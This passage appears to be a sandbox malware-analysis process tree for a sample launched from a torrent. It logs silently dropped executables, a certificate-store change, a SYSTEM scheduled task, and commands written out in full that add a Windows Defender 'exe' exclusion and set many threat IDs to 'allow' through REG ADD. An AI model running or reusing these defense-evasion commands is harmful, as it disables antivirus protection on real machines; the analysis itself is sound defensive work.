- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20724⤵
- Program crash
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exeC:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe /VERYSILENT4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\is-43QLM.tmp\0VWXDTifa42.tmp"C:\Users\Admin\AppData\Local\Temp\is-43QLM.tmp\0VWXDTifa42.tmp" /SL5="$503C6,2448307,138752,C:\Users\Admin\AppData\Local\Temp\zONamexw\0VWXDTifa42.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2860 -
C:\ProgramData\uTorrent\utorrent9.exe"C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT6⤵
- Executes dropped EXE
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\is-I0KS4.tmp\utorrent9.tmp"C:\Users\Admin\AppData\Local\Temp\is-I0KS4.tmp\utorrent9.tmp" /SL5="$403E0,832512,832512,C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1172
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 18924⤵
- Program crash
PID:400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 22564⤵
- Program crash
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exeC:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4948 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
- Indirect Command Execution
PID:768 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhzAbyJhiYArNEwhRY" /SC once /ST 04:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe\" Y8 /NBididel 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 14405⤵
- Program crash
PID:196
-
-
-
[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 1800)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1892
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 3060)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1456
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 1444)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2264
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 3312)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1588
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 4192)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1108
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 4876)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1920
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 3128)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1252
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 6000)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1092
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 5188)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1736
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 5928)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2192
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 5540)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2180
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 436)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2148
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 4632)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1964
    - Program crash

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 232)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1168

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 4428)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2280

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 2700)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2084

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 2136)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2276

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 5420)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2312

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 2564)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2156

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 3048)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2292

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 6108)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2276

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 4324)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2308

[depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 692)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 2268
[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1468)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3444)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3824)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4476)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1632)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1424)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2704)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4576)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2020)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 5108)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3264)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2992)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4388)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4736)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 784)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3384)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4192)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4732)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1568)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1856)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3992)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1444)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 928)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4432)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1052)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 652)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3516)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4580)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1696)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3312)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4200)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1516)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1360)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4244)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1656)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3728)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2112)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 652)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 1468)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2760)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3124)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3480)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4908)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4484)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 332)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2640)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 340)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3892)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2040)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 3744)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1460 -ip 1460

[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 2000)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1460 -ip 1460
[depth 1] C:\Program Files\qBittorrent\qbittorrent.exe (PID 3080)
    cmdline: "C:\Program Files\qBittorrent\qbittorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent"
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener

[depth 1] C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe (PID 5824)
    cmdline: C:\Users\Admin\AppData\Local\Temp\LEXt1lwh\cihvqPa9fiUGQzUJzD3H.exe Y8 /NBididel 757674 /S
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6056)
    cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5508)
    cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe (PID 5340)
    cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5144)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5364)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5368)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5384)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 4488)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3348)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3400)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5636)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5656)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3264)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 4148)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5672)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5692)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 1000)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5712)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 236)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5736)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3140)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5748)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5760)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5776)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5764)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    - System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 1376)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 2208)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 3892)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 1912)
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe (PID 5820)
